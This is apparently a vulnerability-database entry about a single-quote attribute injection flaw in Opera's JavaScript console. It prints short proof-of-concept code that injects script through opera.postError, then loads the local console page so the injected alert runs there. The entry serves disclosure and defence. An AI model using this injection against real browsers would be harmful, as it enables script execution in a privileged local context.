• info
• discussion
• exploit
• solution
• references

Opera JavaScript Console Single Quote Attribute Injection Vulnerability

The following proof-of-concept examples were provided:

var message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

var message = "http://');alert(location.href+'";
opera.postError( message );

Additional exploit examples can be found in the attached Bugtraq reference.
location.href = "file://localhost/console.html";